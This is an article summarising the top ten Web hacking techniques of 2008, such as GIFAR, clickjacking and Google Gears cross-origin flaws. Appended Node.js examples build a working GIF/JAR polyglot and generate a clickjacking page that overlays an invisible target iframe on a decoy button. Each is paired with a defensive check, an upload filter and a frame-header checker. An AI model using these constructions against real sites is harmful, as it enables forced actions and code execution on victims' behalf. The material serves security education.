Top Ten Web Hacking Techniques of 2008

A panel of security experts reviewed the past year’s Web hacking techniques to identify the ten most significant. The results indicate the state of Web security and the implications for businesses that may be hit by such attacks.

By Robert Mullins

Hackers were just as busy as ever in 2008, coming up with ways to thwart the best Web site, browser and application security efforts. The Top Ten hacks — some actual, others theoretical — were acknowledged at RSA® Conference 2009.

“Every year it’s surprising the new types of hacks we discover,” said Jeremiah Grossman, CEO of WhiteHat Security, who hosted the breakout session “Top Ten Web Hacking Techniques of 2008.”

Many of the hacks were discovered by the good guys, security experts who saw a flaw in a browser or application and alerted other good guys in an effort to close that vulnerability, Grossman explained.

Sharing news of these vulnerabilities isn’t meant to give hackers a blueprint for how to be malicious, but to “democratize the playing field,” he said, giving security experts a heads-up to build defenses to possible attacks.

The following hacking techniques were ranked by a panel of four security experts based on their “novelty, impact and pervasiveness,” Grossman explained. The comments from security experts on each hack are from blogs or reports they wrote on the subject:

  1. GIFAR. A contraction of GIF and JAR: a single file that is both a valid GIF image and a valid Java Archive (JAR), the container for the class files of a Java applet. GIFAR allows a potentially malicious file to be accepted as a valid image by a browser, wrote Nathan McFeters, one of four researchers who discovered GIFAR. The trick works because a GIF decoder reads the file from the front and stops at the image trailer, while a JAR (ZIP) reader starts from the end of the file, so one file passes a site’s image-upload checks and is later loaded by the Java plugin as an applet served from that site. “[GIFAR] will allow the execution of arbitrary applet code in the victim’s browser under the context of the web application it was loaded from.”
  2. Breaking Google Gears’ Cross-Origin Communication Model. Google Gears is a browser extension that helps create rich Internet applications (RIAs). The risk lies in how Gears loads “worker” code, JavaScript that can use Gears capabilities such as LocalServer, HTTP communication and the Database. Researcher Yair Amit discovered that the worker loader disregards the response headers (including the content type) of the worker files it loads, so a file an attacker manages to place on a target site, an upload for instance, can be run as a worker in that site’s origin. “That fact opens an aperture for malicious attacks and significantly broadens the options an attacker has for planting malicious code in a target website,” Amit said.
  3. Safari Carpet Bomb. Security expert Nitesh Dhanjani discovered a vulnerability in Apple’s Safari Web browser that allows a rogue website to litter the user’s desktop (when Safari is running on Windows) or download directory (on OS X) with unwanted and potentially malicious files. “This can happen because the Safari browser cannot be configured to obtain the user’s permission before it downloads a resource,” Dhanjani explained.
  4. Clickjacking. Cross-site request forgery (CSRF) is supposed to be thwarted by one-time tokens, or “nonces,” embedded in a web page to legitimize a request; forging such a request would require that “the browser somehow gains access to data in another domain. Clickjacking, however, evades the need for this cross domain reading,” wrote WhiteHat’s Grossman and colleague Robert Hansen. Instead of reading the token, the attacker loads the target page in an invisible frame and lines it up under a decoy, so the victim’s own click lands on the real button and submits the real form, token and all. Clickjacking also can thwart click fraud prevention efforts.
  5. A Different Opera. The Opera Web browser was vulnerable to cross-site scripting, noted Stefano Di Paola. A malicious website visited with Opera could inject arbitrary content, including script, that was rendered into Opera’s internal History Search page (an opera: URL rather than an ordinary website).
  6. Abusing HTML 5 Structured Client-side Storage. HTML 5 lets a website store data in the client’s browser (session storage, local storage and client-side databases) while the user is visiting it, and any script running on that site, including one injected through cross-site scripting, can read it. If a so-called “session storage object” is saved and not deleted when it is no longer needed, it can linger for hours or even days. “It could cause an unwanted leak of data,” wrote Alberto Trivero, who added that current versions of Firefox, Internet Explorer and Safari don’t adequately deal with unneeded session storage objects. “You can’t easily see or delete it.”
  7. Cross-domain leaks of site logins via Authenticated CSS. This hack lets a malicious website learn whether its visitor is currently logged into another site. “The attack relies on the target site hosting an image at a known URL for authenticated users only,” explained Chris Evans and Michal Zalewski, who discovered the vulnerability: the attacker’s page references that URL and observes whether the response behaves like the image or like the login page the site returns to anonymous users. Browsers had closed the same leak for local file system URLs, but not for web URLs. “Browsers suck,” Evans added. “We’re building our fortified web apps on foundations of sand.”
  8. Tunneling TCP over HTTP over SQL Injection. “Creating a TCP circuit through validly formed HTTP requests can enable tunnelling of data in and out of networks,” explained researchers Glenn Wilkinson, Marco Slaviero and Haroon Meer. If a hacker can upload a JSP, PHP or ASP page to a server, he can connect to hosts behind that server, the trio explained; a SQL injection flaw that lets the attacker write a file into the web root plants that page without any upload feature at all.
  9. ActiveX Repurposing. Some ActiveX controls update themselves when a server tells them a new version is available, and a control marked safe for scripting can be driven by any web page that instantiates it. By pointing such a control at a fake upgrade, a hacker “could cause the client to download a possible malicious file,” explained Meer.
  10. Flash Parameter Injection. When an attacker can control the global parameters of a Flash movie (for example through the FlashVars attribute or the query string of the SWF’s URL), he can achieve attacks such as cross-site scripting through Flash, cross-site flashing and changing the flow of the Flash movie, explained three members of IBM Rational’s security team.
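The GIFAR item hinges on two parsers reading the same bytes from opposite ends. The following Node.js program is an added example, not the researchers’ code: it builds a polyglot from a constructed 1x1 GIF and a constructed one-entry JAR (a ZIP holding only a manifest), parses the result once as a GIF and once the way java.util.zip does, and finishes with an upload-side check that rejects the file. The entry name, the image bytes and the trailing-bytes rule are assumptions for the demo.

```javascript
'use strict';
// Added example, not the GIFAR researchers' code. The GIF is read from the
// front and stops at its trailer; the ZIP is read from the END and treats
// everything before the archive as an offset. Names/bytes are placeholders.

// A 1x1 GIF89a, constructed for the demo (43 bytes, trailer at offset 42).
const TINY_GIF = Buffer.from([
  0x47, 0x49, 0x46, 0x38, 0x39, 0x61,                         // "GIF89a"
  0x01, 0x00, 0x01, 0x00, 0x80, 0x00, 0x00,                   // 1x1 screen, 2-colour global table
  0x00, 0x00, 0x00, 0xff, 0xff, 0xff,                         // global colour table
  0x21, 0xf9, 0x04, 0x01, 0x00, 0x00, 0x00, 0x00,             // graphic control extension
  0x2c, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00, // image descriptor
  0x02, 0x02, 0x44, 0x01, 0x00,                               // LZW min code size + one sub-block
  0x3b,                                                       // trailer: decoders stop here
]);

// Walk the GIF the way a decoder does and report where the trailer is;
// bytes after it are ignored by every real decoder.
function parseGif(buf) {
  const sig = buf.toString('latin1', 0, 6);
  if (sig !== 'GIF87a' && sig !== 'GIF89a') throw new Error('not a GIF');
  const width = buf.readUInt16LE(6), height = buf.readUInt16LE(8), packed = buf[10];
  let pos = 13;
  if (packed & 0x80) pos += 3 * (1 << ((packed & 7) + 1));   // global colour table
  const skipSubBlocks = () => {
    let n;
    while ((n = buf[pos++]) !== 0) { if (n === undefined) throw new Error('truncated GIF'); pos += n; }
  };
  for (;;) {
    const b = buf[pos++];
    if (b === 0x3b) return { width, height, trailerOffset: pos - 1 };
    if (b === 0x21) { pos += 1; skipSubBlocks(); }            // extension block
    else if (b === 0x2c) {                                    // image descriptor
      const lp = buf[pos + 8]; pos += 9;
      if (lp & 0x80) pos += 3 * (1 << ((lp & 7) + 1));        // local colour table
      pos += 1; skipSubBlocks();                              // min code size + image data
    } else throw new Error('corrupt GIF');
  }
}

function crc32(buf) {                                         // required by the ZIP headers
  let crc = 0xffffffff;
  for (const byte of buf) {
    let c = (crc ^ byte) & 0xff;
    for (let k = 0; k < 8; k++) c = c & 1 ? (c >>> 1) ^ 0xedb88320 : c >>> 1;
    crc = (crc >>> 8) ^ c;
  }
  return (crc ^ 0xffffffff) >>> 0;
}

// One-entry STORED zip, i.e. the skeleton of a JAR: local header, data,
// central directory, end-of-central-directory (EOCD) record.
function buildZip(name, data) {
  const nm = Buffer.from(name), crc = crc32(data);
  const local = Buffer.alloc(30), central = Buffer.alloc(46), eocd = Buffer.alloc(22);
  local.writeUInt32LE(0x04034b50, 0); local.writeUInt16LE(20, 4);
  local.writeUInt32LE(crc, 14); local.writeUInt32LE(data.length, 18);
  local.writeUInt32LE(data.length, 22); local.writeUInt16LE(nm.length, 26);
  central.writeUInt32LE(0x02014b50, 0); central.writeUInt16LE(20, 4); central.writeUInt16LE(20, 6);
  central.writeUInt32LE(crc, 16); central.writeUInt32LE(data.length, 20);
  central.writeUInt32LE(data.length, 24); central.writeUInt16LE(nm.length, 28);
  central.writeUInt32LE(0, 42);                               // local header at archive offset 0
  eocd.writeUInt32LE(0x06054b50, 0); eocd.writeUInt16LE(1, 8); eocd.writeUInt16LE(1, 10);
  eocd.writeUInt32LE(46 + nm.length, 12);                     // central directory size
  eocd.writeUInt32LE(30 + nm.length + data.length, 16);       // central directory offset
  return Buffer.concat([local, nm, data, central, nm, eocd]);
}

// Read the archive the way java.util.zip does: locate the EOCD from the end
// of the file and follow it back. Leading junk (here, a whole GIF) merely
// shifts the offsets, which is exactly what makes GIFAR work.
function listZipEntries(buf) {
  let eocd = -1;
  for (let i = buf.length - 22; i >= Math.max(0, buf.length - 22 - 0xffff); i--)
    if (buf.readUInt32LE(i) === 0x06054b50) { eocd = i; break; }
  if (eocd < 0) throw new Error('not a zip');
  const count = buf.readUInt16LE(eocd + 10), cdSize = buf.readUInt32LE(eocd + 12);
  const prepended = eocd - cdSize - buf.readUInt32LE(eocd + 16); // bytes before the archive
  const names = [];
  let pos = eocd - cdSize;
  for (let n = 0; n < count; n++) {
    if (buf.readUInt32LE(pos) !== 0x02014b50) throw new Error('bad central directory');
    const nameLen = buf.readUInt16LE(pos + 28);
    names.push(buf.toString('utf8', pos + 46, pos + 46 + nameLen));
    pos += 46 + nameLen + buf.readUInt16LE(pos + 30) + buf.readUInt16LE(pos + 32);
  }
  return { prepended, names };
}

// Valid GIF in front, valid JAR behind. A JAR needs only a manifest to be
// opened; a real attack would add the applet's .class files beside it.
function makeGifar() {
  return Buffer.concat([TINY_GIF, buildZip('META-INF/MANIFEST.MF', Buffer.from('Manifest-Version: 1.0\n'))]);
}

// Upload-side check (an assumed rule, not from the article): a clean GIF ends
// at its trailer and carries no ZIP EOCD signature. Re-encoding uploaded
// images server-side and serving user content from a separate domain is the stronger fix.
function isCleanGif(buf) {
  let trailer;
  try { trailer = parseGif(buf).trailerOffset; } catch (e) { return false; }
  return trailer === buf.length - 1 && buf.indexOf(Buffer.from([0x50, 0x4b, 0x05, 0x06])) === -1;
}

if (typeof require !== 'undefined' && require.main === module) {
  const gifar = makeGifar();
  console.log('image decoder sees:', parseGif(gifar), 'JAR reader sees:', listZipEntries(gifar));
  console.log('upload filter accepts it:', isCleanGif(gifar));
}
```

Run with `node gifar.js`: the decoder reports a 1x1 image, the ZIP reader reports 43 bytes of prepended data and a `META-INF/MANIFEST.MF` entry, and the filter rejects the file while accepting the bare GIF.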
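The clickjacking item describes both halves of the problem, so here is an added example (not code from the article, Grossman or Hansen): the shape of an attacking page, which frames the target transparently over a decoy so the victim’s own click, cookies and anti-CSRF token reach the real form, and a checker for the two response headers that stop a page from being framed: X-Frame-Options, which Internet Explorer 8 introduced in response to this research, and the later Content-Security-Policy frame-ancestors directive. The URLs and origins are placeholders; the CSP matcher is deliberately simplified to 'none', 'self', '*' and scheme/host sources with one leading wildcard, and does not handle ports or scheme-only sources.

```javascript
'use strict';
// Added example, not code from the article or its researchers. Target URL,
// origins and layout offsets are placeholders.

// Attacker page: the decoy button sits under a transparent iframe of the
// target, so the click (with the victim's cookies and the page's own
// anti-CSRF token) is delivered to the real form. No cross-domain read needed.
function clickjackPage(targetUrl) {
  return `<!doctype html>
<style>
  #decoy  { position: absolute; top: 120px; left: 80px; z-index: 0; }
  #target { position: absolute; top: 0; left: 0; width: 600px; height: 400px;
            opacity: 0; z-index: 1; }   /* invisible but on top: it receives the click */
</style>
<button id="decoy">Claim your prize</button>
<iframe id="target" src="${targetUrl}" scrolling="no"></iframe>`;
}

// Does a CSP host-source such as https://*.partner.example match an origin?
// Simplified: scheme optional, one leading wildcard label, no ports.
function matchSource(source, origin) {
  const o = new URL(origin);
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([^/:*]+)$/i.exec(source);
  if (!m) return false;
  const [, scheme, wildcard, host] = m;
  if (scheme && scheme.toLowerCase() + ':' !== o.protocol) return false;
  const have = o.hostname.toLowerCase(), want = host.toLowerCase();
  return wildcard ? have.endsWith('.' + want) : have === want;
}

// May a page at pageOrigin, returned with these response headers, be framed
// by a document at framerOrigin? frame-ancestors takes precedence over
// X-Frame-Options, as in browsers; with neither header the page is framable
// by anyone, which was the situation everywhere in 2008.
function canBeFramed(headers, framerOrigin, pageOrigin) {
  const h = {};
  for (const [k, v] of Object.entries(headers)) h[k.toLowerCase()] = v;
  const csp = h['content-security-policy'] || '';
  const directive = csp.split(';').map(s => s.trim()).find(s => /^frame-ancestors(\s|$)/i.test(s));
  if (directive) {
    const sources = directive.split(/\s+/).slice(1).map(s => s.replace(/^'(.*)'$/, '$1').toLowerCase());
    if (sources.length === 0 || sources.includes('none')) return false;
    return sources.some(s => s === '*' || (s === 'self' ? framerOrigin === pageOrigin : matchSource(s, framerOrigin)));
  }
  const xfo = (h['x-frame-options'] || '').trim().toUpperCase();
  if (xfo === 'DENY') return false;
  if (xfo === 'SAMEORIGIN') return framerOrigin === pageOrigin;
  return true;
}

if (typeof require !== 'undefined' && require.main === module) {
  const bank = 'https://bank.example', evil = 'https://attacker.example';
  console.log(clickjackPage(bank + '/transfer'));
  console.log('no headers, framable by attacker:', canBeFramed({}, evil, bank));
  console.log('X-Frame-Options: DENY ->', canBeFramed({ 'X-Frame-Options': 'DENY' }, evil, bank));
}
```

Point the checker at the headers of any page that performs a state-changing action on a click; if `canBeFramed` returns true for an origin you do not control, a page like `clickjackPage` can drive that action.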
Full list of 2008 hacking techniques considered:

  1. CUPS Detection
  2. CSRFing the uTorrent plugin
  3. Clickjacking / Videojacking
  4. Bypassing URL Authentication and Authorization with HTTP Verb Tampering
  5. I used to know what you watched, on YouTube (CSRF + Crossdomain.xml)
  6. Safari Carpet Bomb
  7. Flash clipboard Hijack
  8. Flash Internet Explorer security model bug
  9. Frame Injection Fun
  10. Free MacWorld Platinum Pass? Yes in 2008!
  11. Diminutive Worm, 161 byte Web Worm
  12. SNMP XSS Attack
  13. Res Timing File Enumeration Without JavaScript in IE7.0
  14. Stealing Basic Auth with Persistent XSS
  15. Smuggling SMTP through open HTTP proxies
  16. Collecting Lots of Free ‘Micro-Deposits’
  17. Using your browser URL history to estimate gender
  18. Cross-site File Upload Attacks
  19. Same Origin Bypassing Using Image Dimensions
  20. HTTP Proxies Bypass Firewalls
  21. Join a Religion Via CSRF
  22. Cross-domain leaks of site logins via Authenticated CSS
  23. JavaScript Global Namespace Pollution
  24. GIFAR
  25. HTML/CSS Injections – Primitive Malicious Code
  26. Hacking Intranets Through Web Interfaces
  27. Cookie Path Traversal
  28. Racing to downgrade users to cookie-less authentication
  29. MySQL and SQL Column Truncation Vulnerabilities
  30. Building Subversive File Sharing With Client Side Applications
  31. Firefox XML injection into parse of remote XML
  32. Firefox cross-domain information theft (simple text strings, some CSV)
  33. Firefox 2 and WebKit nightly cross-domain image theft
  34. Browser’s Ghost Busters
  35. Exploiting XSS vulnerabilities on cookies
  36. Breaking Google Gears’ Cross-Origin Communication Model
  37. Flash Parameter Injection
  38. Cross Environment Hopping
  39. Exploiting Logged Out XSS Vulnerabilities
  40. Exploiting CSRF Protected XSS
  41. ActiveX Repurposing
  42. Tunneling tcp over http over sql-injection
  43. Arbitrary TCP over uploaded pages
  44. Local DoS on CUPS to a remote exploit via specially-crafted webpage
  45. JavaScript Code Flow Manipulation
  46. Common localhost dns misconfiguration can lead to “same site” scripting
  47. Pulling system32 out over blind SQL Injection
  48. Dialog Spoofing – Firefox Basic Authentication
  49. Skype cross-zone scripting vulnerability
  50. Safari pwns Internet Explorer
  51. IE “Print Table of Links” Cross-Zone Scripting Vulnerability
  52. A different Opera
  53. Abusing HTML 5 Structured Client-side Storage
  54. SSID Script Injection
  55. DHCP Script Injection
  56. File Download Injection
  57. Navigation Hijacking (Frame/Tab Injection Attacks)
  58. UPnP Hacking via Flash
  59. Total surveillance made easy with VoIP phone
  60. Social Networks Evil Twin Attacks
  61. Recursive File Include DoS
  62. Multi-pass filters bypass
  63. Session Extending
  64. Code Execution via XSS
  65. Redirector’s hell
  66. Persistent SQL Injection
  67. JSON Hijacking with UTF-7
  68. SQL Smuggling
  69. Abusing PHP Sockets
  70. CSRF on Novell GroupWise WebAccess